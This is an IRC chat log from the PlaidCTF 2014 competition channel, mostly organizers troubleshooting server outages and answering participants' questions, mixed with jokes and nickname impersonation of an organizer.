Session Start: Fri Apr 11 19:12:15 2014
Session Ident: #pctf
(19:12:15)
(19:12:15) jOined: (#pctf)
(19:12:15)
(19:12:15) tOpic: (CTF has started but server is having issues | play.plaidctf.com | HINT: (awreece is a dumbass and we have a problem named zfs))
(19:12:15) uSers: 335 users, 1 ops (0%), 8 voiced (2%), 326 regulars (97%)
(19:12:15) sYnc time: (0.14) second(s)
(19:12:15)
(19:13:21) (mouth`) ec2
(19:13:35) (+tylerni7) CyberPatriots: firewalls where?
(19:13:40) (+tylerni7) our ec2 instances are fine
(19:13:49) (+mserrano) _blasty_: what will be your favorite problem is now open
(19:13:50) (+mserrano) :)
(19:13:53) (+mserrano) glhfdd
(19:13:53) (+tylerni7) lol
(19:13:57) (+cai_) lol
(19:14:07) (_blasty_) ClCOCKFISH!@#
(19:14:08) qUit: (smmalis37) (
[email protected]) Remote host closed the connection
(19:14:15) (CyberPatriots) tylerni7: school. I'm at home, it's fine now.
(19:14:22) (+clockish) _blasty_: :)
(19:14:34) (q3k) tylerni7: not reachable from her either. nat.hackerspace.pl, three machines behind it trying to reach the site
(19:14:37) (q3k) *here
(19:15:23) (spq) not reachable from here: 89.0.54.50
(19:15:33) (AlephZero) everything was fine for me until about 3 minutes ago, getting 504 from nginx now
(19:15:41) (+cai_) AlephZero: yeah noticed
(19:15:45) (+cai_) looking into it
(19:15:47) (+cai_) thanks!
(19:15:52) (Guest77623) I think I've figured out what is going on with webcat-- probably people not the admins keep resetting my password :-(
(19:16:26) (+tylerni7) Guest77623: heh did you choose name "admin"
(19:16:36) (Valodim) haha
(19:16:45) (Guest77623) No, I used other names.
(19:16:46) (spq) tylerni7: can you unblock us or something?
(19:16:53) (+tylerni7) spq: for main site?
(19:16:56) (AlephZero) cool, thanks for running an awesome challenge :) i'm hitting the sack now (01:17 BST here)
(19:16:58) (+tylerni7) no one is blocked on main site
(19:17:00) (+mserrano) spq: I don't think you were blocked on our side
(19:17:06) (+mserrano) I suspect *we* were blocked on your side
(19:17:08) (+tylerni7) if it's for challenges, pm me
(19:17:15) (+mserrano) unles it's for challenges
(19:17:36) (Phshap) so the challenge for rendezous must be to connect to the service?
(19:17:42) (spq) mserrano: why should we block you o_O
(19:17:43) (+houqp) yes
(19:17:58) (asmoday) hmm wallet id
(19:18:00) (+houqp) Phshap: once you loads the page, you see the flag
(19:18:01) (+cai_) yeah the weirdness on main website came back...
(19:18:10) (Phshap) oh! ty
(19:18:16) (spq) i cant ping 54.208.233.50 from here, from other servers i can
(19:18:19) (+mserrano) spq: are you behind a nat?
(19:18:19) (inter) i think i know what to do with rendezvous
(19:18:25) (+mserrano) oh hm is that a probelm
(19:18:27) (inter) but i cant do it gg
(19:18:34) (+houqp) inter: why?
(19:18:37) (+tylerni7) spq: ah okay so challenge server
(19:18:37) (inter) im in dorm
(19:18:38) (+mserrano) no, that's the main site
(19:18:42) (+tylerni7) oh
(19:18:48) (+tylerni7) we haven't blocked anyone from the main site
(19:18:51) (+tylerni7) though... maybe we should
(19:19:04) (spq) hmm
(19:19:22) (spq) we dont block anything o_O
(19:19:56) (+tylerni7) spq: you can pm me and I can look through logs
(19:20:01) (+tylerni7) oh wait you posted the ip
(19:20:03) (+tylerni7) I'll check
(19:20:34) (+tylerni7) spq: I see plenty of successful connections from that IP
(19:20:36) (spq) traceroute 0.po102.esd1.wbr.nac.net last hop
(19:21:18) (rvpersie) is too late to change the team am on?
(19:21:27) (+tylerni7) rvpersie: no
(19:21:32) (+tylerni7) spq: grep 89.0.54.50 pctf2014.access.log | grep 200 | wc -l
(19:21:32) (+tylerni7) 2889
(19:22:03) (q3k) tylerni7: could you take a look at why nat.hackerspace.pl can't reach the flag server, while q3k.org can?
(19:22:21) (rvpersie) Thanks tylerni7, how do i go about that
(19:22:29) (+tylerni7) rvpersie: stop playing on one team
(19:22:36) (+tylerni7) play on the new one by using their login?
(19:22:41) (poppopret) lol you wanna switch teams?
(19:22:51) (rvpersie) yeah :/
(19:23:25) (+tylerni7) q3k: same thing there, I suspect some people on your NAT are able to hit it or have tabs open
(19:23:31) (CyberPatriots) quick guys, everyone join one team so everyone is a winner!
(19:23:34) (spq) hmm, all ppl from our two hackerspaces(different cities, different infrastructure) cant reach your server, all from other places can
(19:23:47) (+mserrano) that is very strange
(19:25:20) (wahwah) the main site isn't reachable for us, either
(19:25:29) (+mserrano) just went down
(19:25:36) (fuzyll) aaaaaaaand it's gone
(19:25:47) (+tylerni7) not sure why NATs are really sad
(19:26:06) qUit: (bloup_) (869b5f0a@gateway/web/freenode/ip.134.155.95.10) Ping timeout: 240 seconds
(19:26:23) (iago-x86) All right, time to make dinner and hope somebody hacks together a /simple again :)
(19:26:32) (+tylerni7) my hacky recommendation is to tell everyone to close the shit and have one person use it
(19:27:03) (Sin__) i just want it to load. why doesn't it load?
(19:27:19) jOin: (a13k) (~a13k@unaffiliated/a13k)
(19:27:55) (+tylerni7) everyone that says it isn't loading from their nat, as far as I have seen, has at least 1 person loading successfully from their NAT
(19:28:01) (poppopret) wish i dloaded the binary before it went down =/
(19:28:10) (Sin__) what binary ?
(19:28:13) (+mserrano) it wasn't a binary
(19:28:15) (a13k) 1 person loading something doesn't mean it's working
(19:28:17) (+tylerni7) my /guess/ is that your NAT has some sort of rate limiting
(19:28:17) (Sin__) no binary
(19:28:20) (jduck) quick, dirbuster on play.plaidctf.com!!
(19:28:23) (+mserrano) jduck: :|
(19:28:25) jOin: (PHLAK) (~chris@unaffiliated/phlak)
(19:28:25) (jduck) @_@
(19:28:25) (+tylerni7) a13k: but that also means it's not a problem on our end
(19:28:39) (Sin__) i'm not behind a nat and it ain't working at all
(19:28:48) (jduck) yeah its dead here too
(19:28:49) (a13k) tylerni7: is it working for them right now? because it worked for me 5 mins ago
(19:28:49) (+mserrano) Sin__: yes. it just went down. we are bringing it back up
(19:28:55) (a13k) tylerni7: and isn't any more
(19:29:26) (a13k) http://isup.me/play.plaidctf.com
(19:29:39) (Sin__) CTF-hosting-as-a-service
(19:30:12) (+cai_) the server is currently down btw
(19:30:17) (+cai_) (main website)
(19:31:36) qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Ping timeout: 240 seconds
(19:33:36) qUit: (irctc454) (71e09e85@gateway/web/freenode/ip.113.224.158.133) Ping timeout: 240 seconds
(19:33:53) (poppopret) estimated time frame for when it'll be back up?
(19:34:06) (+tylerni7) not sure...
(19:34:30) (+clockish) _blasty_: Reinhart: did you see my python problem did you see it?
(19:34:30) (+clockish) i like python i like python i like python
(19:34:41) (+tylerni7) clockish: I don't think anyone has been able to see it
(19:34:45) (+tylerni7) because server rebooted
(19:34:47) (+tylerni7) etc
(19:34:48) (+clockish) oh
(19:34:49) (Sin__) i saw it
(19:34:51) (+cai_) poppopret: we are trying to replace underlying webserver at the moment
(19:34:54) (Sin__) nightmare, right?
(19:35:01) (poppopret) ok
(19:35:05) (+clockish) Sin__: yeah
(19:35:08) (poppopret) i'll check back in an hour or two
(19:35:12) (gsilvis_) __nightmare__?
(19:35:13) (altf4) There a mirror for any of the challenge files by chance?
(19:35:14) (+mserrano) gsilvis_: yes
(19:35:21) (gsilvis_) we saw it, at least!
(19:35:22) (Sin__) i was so excited to see an pwnable but alas, it's python
(19:35:26) (gsilvis_) danny's enjoying it a lot
(19:35:28) (+clockish) gsilvis_: \o/
(19:35:32) (+mserrano) ;)
(19:35:36) qUit: (jozsefgezabela) (c1e17dfd@gateway/web/freenode/ip.193.225.125.253) Ping timeout: 240 seconds
(19:35:42) jOin: (drc) (768b4983@gateway/web/freenode/ip.118.139.73.131)
(19:35:43) (gsilvis_) I find it highly entertaining, but I don't know shit about that kind of thing
(19:35:49) (+clockish) Sin__: AND WHAT IS WRONG WITH PYTHON??????
(19:35:52) (+mserrano) Sin__: there are binaries in the future
(19:35:57) (+mserrano) just none open yet apparently
(19:36:06) nIck: (drc) is now known as (Guest8491)
(19:36:14) nIck: (Guest8491) is now known as (drc`)
(19:36:28) (drc`) hi all!
(19:36:28) jOin: ([gon]starmie) (8ff8eb9c@gateway/web/freenode/ip.143.248.235.156)
(19:36:35) (robbje) webthingy is slow
(19:36:49) (drc`) just letting you know that we're having no luck connecting to play.plaidctf.com from aus
(19:37:00) (+clockish) drc`: we're currently down
(19:37:05) (+clockish) to make things faster
(19:37:06) (drc`) ah
(19:37:12) (drc`) (Y)
(19:37:17) (Valodim) well, at least we're not alone now
(19:37:23) (+tylerni7) -_-
(19:37:32) (inter) yo tyler
(19:37:36) (inter) what should i get for dinner
(19:37:38) (robbje) Plaid Parliament of Hosting!
(19:37:42) (inter) 1. pizza hut 2. subway 3. pita pit
(19:37:47) jOin: (bob__) (~bob@2607:fe50:0:8102:1b0:9b4c:7953:38cf)
(19:37:53) (+tylerni7) inter: 1 or 3
(19:37:54) jOin: (DooMMasteR) (~DooMMaste@unaffiliated/doommaster)
(19:37:55) (nullProtectorate) SUBWAY
(19:38:03) (+tylerni7) 3 will probably make you feel less shitty
(19:38:10) (+clockish) why choose, get all three!
(19:38:23) (inter) clockish: all 3 will make me feel even worse
(19:38:29) (DooMMasteR) I already feel better knowing the page is completely down :)
(19:38:37) (+clockish) inter: yeah with that attitude it will
(19:38:38) (inter) tylerni7: 3 and a puff should help my mood :D
(19:38:43) (+mserrano) I hate computers
(19:38:46) (DooMMasteR) better then having ones TCP conns rejected
(19:38:47) (+tylerni7) heh
(19:38:55) (+clockish) DooMMasteR++
(19:39:07) (inter) clockish: 1 large pizza, footlong subway, and medium pita
(19:39:18) (inter) #challenge
(19:39:20) (soleblaze) ls
(19:39:20) jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
(19:39:24) (this_is_a_new_ni) server is being very flaky
(19:39:28) (drc`) cat flag
(19:39:29) (+tylerni7) yes
(19:39:32) (iago-x86) I had leftover Chinese food :D
(19:39:33) (this_is_a_new_ni) took about 30 mins to just log in
(19:39:38) (+tylerni7) we're working on it...
(19:39:41) (soleblaze) drc`: for reals.
(21:45:27) * Disconnected
Session Close: Fri Apr 11 21:45:28 2014
Session Start: Fri Apr 11 21:45:28 2014
Session Ident: #pctf
(21:45:38) rAw (0) LS account-notify extended-join identify-msg multi-prefix sasl
(21:45:39) rAw (0) ACK multi-prefix
(21:45:39) rAw (265) 5130 12000 Current local users 5130, max 12000
(21:45:39) rAw (266) 80346 95150 Current global users 80346, max 95150
(21:45:39) rAw (250) Highest connection count: 12001 (12000 clients) (25881 connections received)
(21:45:39) -NickServ- This nickname is registered. Please choose a different nickname, or identify via /msg NickServ identify <password>.
(21:45:40) * Attempting to rejoin channel #pctf
(21:45:45)
(21:45:45) jOined: (#pctf)
(21:45:45)
(21:45:45) tOpic: (CTF has started but server is having issues | play.plaidctf.com | HINT: (awreece is a dumbass and we have a problem named zfs))
(21:45:45) uSers: 356 users, 1 ops (0%), 9 voiced (3%), 346 regulars (97%)
(21:45:45) sYnc time: (0.25) second(s)
(21:45:45)
(21:45:50) (nextsecu) Oh
(21:45:55) (x_x) Site still having issues?
(21:46:15) (+cai_) pwnable is opened
(21:46:30) jOin: (suntzu_II) (b83a0767@gateway/web/freenode/ip.184.58.7.103)
(21:46:30) (_blasty_) 404
(21:46:32) (_blasty_) cai
(21:46:32) (allanlw) 404
(21:46:38) (doom) 404
(21:46:38) (allanlw) tylerni7: ^
(21:46:39) (doom) q_q
(21:46:41) (Anyny0) 404 D=
(21:46:47) (+cai_) q_Q
(21:46:56) (fuzyll) gateway is bad, need more minerals and a probe
(21:47:11) (nextsecu) 404 :(
(21:47:16) (marcan) needs moar cloud
(21:47:21) (+cai_) put 2 at the end of it
(21:47:22) (+cai_) bz2
(21:47:24) (+cai_) instead of bz
(21:47:25) (+tylerni7) lol
(21:47:27) (_blasty_) durr
(21:47:27) (+cai_) we will fix the text
(21:47:29) (_blasty_) 404
(21:47:36) (_blasty_) with bz2
(21:47:42) (conan) 502
(21:47:47) (nextsecu) incoming 502
(21:47:48) (nextsecu) !!
(21:47:59) (juan_) hi, same here 502 error
(21:48:17) (+mserrano) Okay I made a mistake
(21:48:21) (+tylerni7) lol
(21:48:23) (TobalJackson) uh oh
(21:48:24) (x7r0n) does crypto 20 needs a password to be cracked ?
(21:48:25) (nextsecu) CTF pre-qual servers are usually dang shitty
(21:48:28) (TobalJackson) 502 bad gateway?
(21:48:31) (+mserrano) iboth .bz and .bz2 should now be up
(21:48:34) (_blasty_) ok works
(21:48:35) (+mserrano) I just forgot to upload that one
(21:48:35) (+mserrano) sorry
(21:48:40) (+cai_) we are trying to fix 502 errors sorry
(21:48:54) (+cai_) so just refresh for now
(21:49:28) (Anyny0) Working
(21:49:48) (nextsecu) Well this server is a lot better then Codegate 2014 PreQual server so.. yep
(21:50:02) (TobalJackson) I still can't create an account
(21:50:16) (+cai_) TobalJackson: is that because of 502 errors?
(21:50:22) (TobalJackson) no i'm on the registration page
(21:50:29) (+cai_) on play.plaidctf.com?
(21:50:31) (TobalJackson) but when i click the "create an account" button
(21:50:37) (TobalJackson) nothing happens
(21:50:40) (+cai_) ah
(21:50:45) (TobalJackson) yeah, on play.plaidctf.com/register
(21:50:50) (+cai_) just trying clicking few times
(21:50:58) (+cai_) it's ajax and probably getting 502s
(21:51:06) (TobalJackson) doh
(21:51:09) (TobalJackson) yeah, 502
(21:51:14) (+cai_) yeah, we are looking into that
(21:51:16) (+cai_) sorry about that
(21:51:23) (TobalJackson) oh sweet
(21:51:26) (TobalJackson) it registered me
(21:51:43) (+cai_) cool
(21:54:36) qUit: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43) Ping timeout: 240 seconds
(21:55:28) qUit: (dodgyvan_) (
[email protected]) Remote host closed the connection
(21:55:33) (robbje) aaand it's gone
(21:56:19) (+ricky) Ugh, sorry, we're bringing up more instantes, but DNS is slow :-(
(21:56:24) qUit: (_simo) (
[email protected]) Quit: segfault at 7fff1ebe5000 ip 000000000041274b sp 00007fff1ebe32f8 error 6
(21:57:04) (namrog84) this is my first ctf, and not sure if i missed it somewhere, but can flags have spaces?
(21:57:30) (cool_guy) why can't i login ?
(21:57:38) (Anyny0) Flags can be anything
(21:57:46) (iago-x86) Question for anybody.. what's the goal of WhatsCat? I have the vuln, but I don't know what to do with it
(21:58:13) (Hertz__) find a flag
(21:58:18) (iago-x86) ooh
(21:58:20) (iago-x86) Gotcha! :P
(21:58:29) (chandler1234) iago-x86: the goal is to write a gui interface in visual basic to find the flag
(21:58:32) (+cai_) cool_guy: hmm.. try again, it might be 502'ing which we are trying to fix now
(21:58:50) (cool_guy) ohk
(21:58:56) (+cai_) namrog84: in pctf, there's no key that has spaces
(21:58:57) (+ricky) Hoping things will improve significantly once DNS propagates
(21:59:26) jOin: (n00b13) (~n00b13@unaffiliated/nitsua)
(21:59:38) jOin: (loca) (79a88098@gateway/web/freenode/ip.121.168.128.152)
(21:59:40) (+mserrano) Is anyone from eLoL in here
(21:59:46) jOin: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105)
(21:59:54) pArt: (n00b13) (~n00b13@unaffiliated/nitsua)
(21:59:56) jOin: (n00b13) (~n00b13@unaffiliated/nitsua)
(22:00:45) jOin: (Luffy) (47cfa62b@gateway/web/freenode/ip.71.207.166.43)
(22:00:52) jOin: (CyberPatriots) (60279873@gateway/web/freenode/ip.96.39.152.115)
(22:01:29) (n00b13) any hints for web 1?
(22:01:37) (nextsecu) What is web 1
(22:01:52) (nextsecu) You meaning mtpox?
(22:01:58) (n00b13) yeah
(22:02:01) jOin: (irctc470) (bca2e4da@gateway/web/freenode/ip.188.162.228.218)
(22:02:47) (mischa__) whatscat is down?
(22:03:02) (upb) for me aswell
(22:03:04) (HighFiveBell) Are there direct links to the challenges for those having trouble getting to the site? Like last year.
(22:03:05) (Anyny0) yup
(22:03:36) qUit: (CW) (c5062d79@gateway/web/freenode/ip.197.6.45.121) Ping timeout: 240 seconds
(22:03:36) qUit: (amar__) (80edcd12@gateway/web/freenode/ip.128.237.205.18) Ping timeout: 240 seconds
(22:03:38) (ayrx) whatscat looks down to me
(22:03:44) (Anyny0) http://play.plaidctf.com/problems/view/ [id]
(22:04:01) (fuzyll) 6 hours into the competition, and some of us are just now realizing we don't have IDA installed...
(22:04:02) (upb) grrrrrrrrr
(22:04:04) (+ricky) ayrx: Thanks, banned a dirbuster
(22:04:15) (Luffy) youre welcome
(22:04:36) qUit: (irctc621) (81f4f232@gateway/web/freenode/ip.129.244.242.50) Ping timeout: 240 seconds
(22:04:49) qUit: (Hertz__) (
[email protected]) Read error: Connection reset by peer
(22:05:12) (+cai_) running dirbuster wouldn't get you anywhere... other than getting banned.. so don't do it :p
(22:05:13) (namrog84) cai_ thanks! I got it submitted and it accepted it :D
(22:05:32) (+cai_) namrog84: cool!
(22:06:35) (arthurdent) whatscat looks down to me too
(22:06:48) (xp45g) were you running dirbuster? =P
(22:07:01) (+mserrano) If you ran dirbuster
(22:07:03) (+mserrano) we banned you
(22:07:04) (+mserrano) sorry
(22:07:34) (Luffy) i'm sooooo sorrrry please forgive me!
(22:07:36) qUit: (eastwolf__) (b8bf2376@gateway/web/freenode/ip.184.191.35.118) Ping timeout: 240 seconds
(22:07:38) (Luffy) nah jk
(22:07:39) (+mserrano) lol
(22:07:42) (Luffy) i wasn't one of the onew
(22:07:44) (Luffy) ones*
(22:07:54) (Luffy) i hadnt even heard of dirbuster until today
(22:08:07) jOin: (oiasjd) (45a32320@gateway/web/freenode/ip.69.163.35.32)
(22:08:13) (+mserrano) lol
(22:08:19) mOde: (ChanServ) sets (+v-v awreece houqp)
(22:08:20) (+ricky) I didn't see anybody from a similar IP here
(22:08:24) (soleblaze) So the solution to web challenges in ctfs isn't to run a web scanner against them on max speed?
(22:08:30) (soleblaze) who knew.
(22:08:32) qUit: (makler2004) (
[email protected]) Quit: ChatZilla 0.9.90.1 [Firefox 28.0/20140314220517]
(22:08:56) (Anyny0) x)
(22:09:10) mOde: (ChanServ) sets (+v houqp)
(22:09:15) (+ricky) If 75.187.201.95 is in here, that's why you're banned
(22:09:52) (Luffy) um
(22:09:58) (Luffy) phew thats not me
(22:10:24) (mischa__) it was up for 3 sec and now down again?
(22:10:30) (Luffy) question
(22:10:38) (Anyny0) Is rendezvous simply cookie "guessing" or is there something else?
(22:10:40) (Luffy) how are you finding out who is using dirbuster?
(22:10:55) (upb) you want to change your user agent?:P
(22:10:56) (+ricky) mischa__: Are you talking about whatscat?
(22:11:02) (+ricky) It seems to be working OK for me
(22:11:02) (mischa__) yes ricky
(22:11:04) (arthurdent) plz2watscat
(22:11:07) (arthurdent) not working for me
(22:11:16) (upb) yep same.. perhaps a smoke break is needed
(22:11:22) (arthurdent) page loads but trying to register, etc
(22:11:25) (+ricky) Not working as in down, or solution not working?
(22:11:25) (arthurdent) no go
(22:11:28) (+ricky) Ah let me try
(22:11:38) (upb) noresponse to http request
(22:11:43) (upb) timing out
(22:11:45) (arthurdent) yeah page loading might just be caching
(22:11:53) (asmoday) no email sent whatacat
(22:13:18) (mischa__) ricky: not working as in down
(22:13:19) (+tylerni7) sorry back now
(22:13:22) (+tylerni7) will look at whatscat
(22:13:23) (arthurdent) yeah it's down
(22:13:30) (Anyny0) Hint for rendezvous?
(22:13:59) (altf4) when will superdupercomputer be released? ;)
(22:14:01) qUit: (borski_) (uid11196@gateway/web/irccloud.com/x-xlhtoriywnjyfaot)
(22:14:27) jOin: (mrsmith) (uid11196@gateway/web/irccloud.com/x-kzvglmufthkyvsgk)
(22:14:31) nIck: (mrsmith) is now known as (mrsmith67)
(22:14:41) (mrsmith67) hint on web150?
(22:14:44) * Disconnected
Session Close: Fri Apr 11 22:14:44 2014
Session Start: Sat Apr 12 00:14:02 2014
Session Ident: #pctf
(00:14:02)
(00:14:02) jOined: (#pctf)
(00:14:02)
(00:14:02) tOpic: (CTF has started but server is having issues | play.plaidctf.com | HINT: (awreece is a dumbass and we have a problem named zfs))
(00:14:02) uSers: 359 users, 1 ops (0%), 11 voiced (3%), 347 regulars (97%)
(00:14:02) sYnc time: (0.08) second(s)
(00:14:02)
(00:14:04) (asmoday) yeah my team left me for their girlfriends..my brain gave up hours ago I am so lost its making me consider applying at walmart
(00:14:18) (x_x) Don't do it. It's not worth it.
(00:14:32) (imnottyler) Tylerni7 are you a real hacker?
(00:14:38) (+tylerni7) no
(00:14:50) (imnottyler) im pretty you are!
(00:14:52) (asmoday) I cannot tell what the hell is up with this rsa private key
(00:15:24) (imnottyler) here is the challenge!
(00:15:24) (+tylerni7) bitrot man
(00:15:27) (+tylerni7) it's a terrible thing
(00:15:28) (+clockish_or_tylr) tylerni7 hacked me, and I don't know who I am anymore
(00:15:29) (tylerma7) http://imgur.com/oLeF52U
(00:15:32) (poppopret) is it possible to debug elf files locally in IDA?
(00:15:36) (imnottyler) here is the challenge
(00:15:46) (imnottyler) a big Stegano challenge!
(00:16:41) (UsedOils) Yup Tyler is the real hacker
(00:16:48) (imnottyler) you can submit the flag in pm
(00:16:49) (TYLERVII) wow im excited
(00:17:20) (tylerma7) wow, much challenge, so tough, wow
(00:17:36) nIck: (UsedOils) is now known as (Tylernl7)
(00:17:40) (+tylerni7) poppopret: yeah
(00:17:47) (+tylerni7) it can connect to a gdb server
(00:17:49) (imnottyler) you look pretty good...no?
(00:18:16) (+tylerni7) tylerma7: oh my god
(00:18:18) (+tylerni7) that is the best
(00:18:29) (+tylerni7) <3
(00:18:35) (tylerma7) <3
(00:18:39) (Tylernl7) <3
(00:18:40) (TYLERVII) imnottyler: Its a very good stegano chall
(00:18:51) (imnottyler) 500 points
(00:18:52) (+dickoff) wtf is going on
(00:18:55) (+tylerni7) lol
(00:18:59) (imnottyler) you win the acuvent challenge
(00:19:04) (+clockish_or_tylr) dickoff: we're all tyler
(00:19:06) (+clockish_or_tylr) maybe
(00:19:35) qUit: (ra_) (5d2accbd@gateway/web/freenode/ip.93.42.204.189) Ping timeout: 240 seconds
(00:19:56) (kevin``) is rendezvous down?
(00:20:03) (imnottyler) roll the fucking dice !!!
(00:20:11) (+tylerni7) kevin``: rendezvous has been up the entire game
(00:20:17) (+tylerni7) and you are about the 50th person to ask if it is down
(00:20:20) (+tylerni7) this isn't your fault
(00:20:23) (imnottyler) kevin you wann rendez vous!
(00:20:25) (imnottyler) ?
(00:20:27) (+tylerni7) but I'm just saying I don't want to check it again
(00:20:35) (+houqp) kevin``: it's up
(00:20:37) (+tylerni7) because... the answer will almost certainly be yes
(00:20:38) (+tylerni7) :P
(00:20:39) (+tylerni7) thanks houqp
(00:20:46) (kevin``) ok, no worries. my local tor is probably fucked then, or i'm missing something
(00:20:48) (kevin``) thanks
(00:21:05) (imnottyler) the cookie is tyler!!
(00:21:08) (+houqp) kevin``: standard client will not work for this problem
(00:21:09) (imnottyler) RTFM
(00:21:23) (+houqp) the cookie is tylerni7
(00:21:28) (tylerma7) why is the chrono thing is stuck again? i don't get that part of the game
(00:21:47) (+mserrano) tylerma7: an unsolved problem needs to be solved
(00:21:50) (+mserrano) for it to unstuck
(00:21:56) (tylerma7) kk
(00:22:06) (imnottyler) we resolv the tyler stegano challenge
(00:22:07) jOin: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17)
(00:22:49) (TYLERVII) stupid challenge release
(00:23:08) (+tylerni7) in an hour or two we'll probably open up something new... tiffany and rsa are both pretty hard
(00:23:22) (imnottyler) wow
(00:23:30) (imnottyler) its a long time!
(00:23:50) (TYLERVII) wtf
(00:24:01) (TYLERVII) drop it likes its hot
(00:26:15) (+tylerni7) tomcr00se: how's it going?
(00:26:31) (tomcr00se) she's done
(00:26:39) (tomcr00se) in the kitchen now at the sink
(00:26:54) (+tylerni7) -_-
(00:27:04) nIck: (cyber) is now known as (cybercybercyber)
(00:27:04) (imnottyler) really bad tylerni7
(00:27:13) (+cai_) tomcr00se: lol
(00:27:19) (n00b13) does firebug help fore web150?
(00:27:27) (poppopret) lol
(00:27:28) (imnottyler) even tomcr00se didnt answer any challenge
(00:27:35) (+cai_) GaCTF: lol you are bad at CTF'ing
(00:27:38) (+tylerni7) imnottyler: he did at least one
(00:27:48) qUit: (motherapplenator) (
[email protected]) Ping timeout: 258 seconds
(00:27:51) (imnottyler) they just find the poop one!
(00:28:00) (+cai_) submitting all characters on your keyboard wouldn't get you points :p
(00:28:20) (+cai_) and you made a typo
(00:28:25) (+cai_) that was supposed to be 6
(00:28:28) (+cai_) not .
(00:28:40) (asmoday) I got stuck at mtpox admin then blood started shooting out of my ears
(00:29:01) (asmoday) turns out they stripped tiffany before breakfast
(00:29:08) (+mserrano) wut
(00:29:15) (asmoday) and not bitrot is going to make me a janitor
(00:29:19) (asmoday) *now
(00:30:16) (TYLERVII) C'mon man
(00:30:38) (TYLERVII) we want new challenges
(00:30:47) (imnottyler) this is the wooooooooooooorst CTF ever!!!!!!
(00:30:51) (imnottyler) from all the time!
(00:30:51) (+mserrano) imnottyler: :(
(00:30:54) (+mserrano) why do you say that
(00:31:25) nIck: (imnottyler) is now known as (ImtheMuscleTyler)
(00:31:47) nIck: (Tylernl7) is now known as (BenchMeTyler)
(00:31:53) (+tylerni7) o.0
(00:32:05) qUit: (irctc141) (48d7df83@gateway/web/freenode/ip.72.215.223.131) Ping timeout: 240 seconds
(00:32:21) jOin: (sibios) (~sibios@unaffiliated/sibios)
(00:32:33) qUit: (RPISEC) (807163f2@gateway/web/cgi-irc/kiwiirc.com/ip.128.113.99.242) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(00:33:16) nIck: (TYLERVII) is now known as (dropnewchallenge)
(00:33:31) (dwn) admins pls fix email disclosure in whatscat
(00:33:33) (RentjongTinTin) is there any other clue on mtpox? we should guess $SECRET and $auth to match with hsh?
(00:33:33) (dwn) unfriendly cats
(00:33:34) (virodoran) asmoday: I've got blood shooting out of my ears too
(00:33:43) nIck: (dropnewchallenge) is now known as (newchallengessss)
(00:33:52) (virodoran) typical Friday night
(00:34:05) qUit: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17) Ping timeout: 240 seconds
(00:34:54) jOin: (DaramG) (8ff8eb18@gateway/web/cgi-irc/kiwiirc.com/ip.143.248.235.24)
(00:35:04) (ImtheMuscleTyler) dirbuster time!!!
(00:35:04) (Yen1) can I ask a question about web 300?
(00:35:17) (ImtheMuscleTyler) no question is acceptable!
(00:35:21) (Yen1) darn
(00:35:29) (ImtheMuscleTyler) you will be ban Yen1
(00:35:42) Yen1 hangs head in banned shame
(00:35:50) (+tylerni7) ImtheMuscleTyler: :|
(00:35:51) (ImtheMuscleTyler) kickout!
(00:35:57) (+tylerni7) Yen1: feel free to pm me any questions
(00:36:02) (+tylerni7) please no dirbuster
(00:36:02) (ImtheMuscleTyler) me
(00:36:03) (ImtheMuscleTyler) too
(00:36:06) (+tylerni7) dirbuster makes servers sad
(00:36:18) (ImtheMuscleTyler) ask me your question
(00:36:23) (virodoran) LOIC makes them happy
(00:36:27) (ImtheMuscleTyler) im availlable for any help
(00:36:28) (virodoran) keeps them entertained
(00:36:40) (+clockish_or_tylr) virodoran: pls no
(00:37:04) (asmoday) screw it i will wait for the write ups
(00:37:10) (asmoday) Bsides was better
(00:37:14) (BenchMeTyler) asmoday +1 point
(00:37:28) (ImtheMuscleTyler) Yen1 ask me, im the master chief of this CTF
(00:37:35) (+clockish_or_tylr) asmoday: hack harder
(00:37:36) (ImtheMuscleTyler) i will answer nything you want!
(00:37:49) (dwn) 00:33 <+mserrano> and then you move that many spaces forwards
(00:37:51) (dwn) uh
(00:37:54) (dwn) how do we know where we are
(00:38:04) (asmoday) I am on my own ha I killed my connection running sqlmap, nikto, and trying to do this python rsa script
(00:38:05) (+clockish_or_tylr) asmoday: or come back later when more problems are open, there are a lot more different ones still hiding
(00:38:05) (dwn) like i figured that
(00:38:19) (+mserrano) dwn: you are at the latest problem opened
(00:38:22) (+mserrano) so, rsa right now
(00:38:23) (virodoran) dwn: the yellow one with the lines in it
(00:38:27) (dwn) oh ok
(00:38:29) nIck: (newchallengessss) is now known as (Tylerni007)
(00:38:30) (+mserrano) and those lines across it are the indicator
(00:38:32) (Yerer) So for rendezvous, is the fact that I'm unable to connect to the site on TOR part of the problem itself or just a personal problem/server problem?
(00:38:38) (dwn) does it loop back around
(00:38:40) (virodoran) dwn: see: http://play.plaidctf.com/rules
(00:38:40) (dwn) or are they lost forever
(00:38:47) (dwn) who reads rules...
(00:39:10) (+mserrano) dwn: it loops
(00:39:17) (+mserrano) dwn: but first it goes through the time portal
(00:39:20) (virodoran) people who want to procastinate working on the ctf problems
(00:39:36) (ImtheMuscleTyler) Do you know 1 Hacker that read rules?
(00:39:46) (+tylerni7) Yerer: read it more carefully
(00:39:51) (+tylerni7) it is running and has been solved
(00:40:07) (dwn) can confirm, was easy
(00:40:13) (dwn) too easy please make ctf harder
(00:40:15) nIck: (clockish_or_tylr) is now known as (clockish)
(00:40:28) (dwn) more stegano
(00:40:32) (+cai_) oh yeah, when it loops, already opened tiles are not going to be counted for the rolls
(00:40:35) (Yerer) Okay thanks just didn't want to think and then realize server is just down or something
(00:40:37) (Tylerni007) sorry guys for the inconveniences
(00:40:43) (_eko) clockish: you're in charge for the pyjail ?
(00:40:49) (dwn) i am
(00:40:54) (+clockish) _eko: yes
(00:41:26) (Tylerni007) come see me if you have any troubles
(00:42:05) qUit: (loca) (79a88098@gateway/web/freenode/ip.121.168.128.152) Ping timeout: 240 seconds
(00:43:16) (Tylerni007) we are currently fixing the 502 bad gateway
(00:43:26) (Tylerni007) sorry for the mess guys
(00:43:57) (+tylerni7) lol
(00:44:13) (+clockish) Tylerni007: DO A BETTER JOB OF IT
(00:44:14) (+clockish) JESUS
(00:44:24) (justinsteven) hmm. whatscat is having issues?
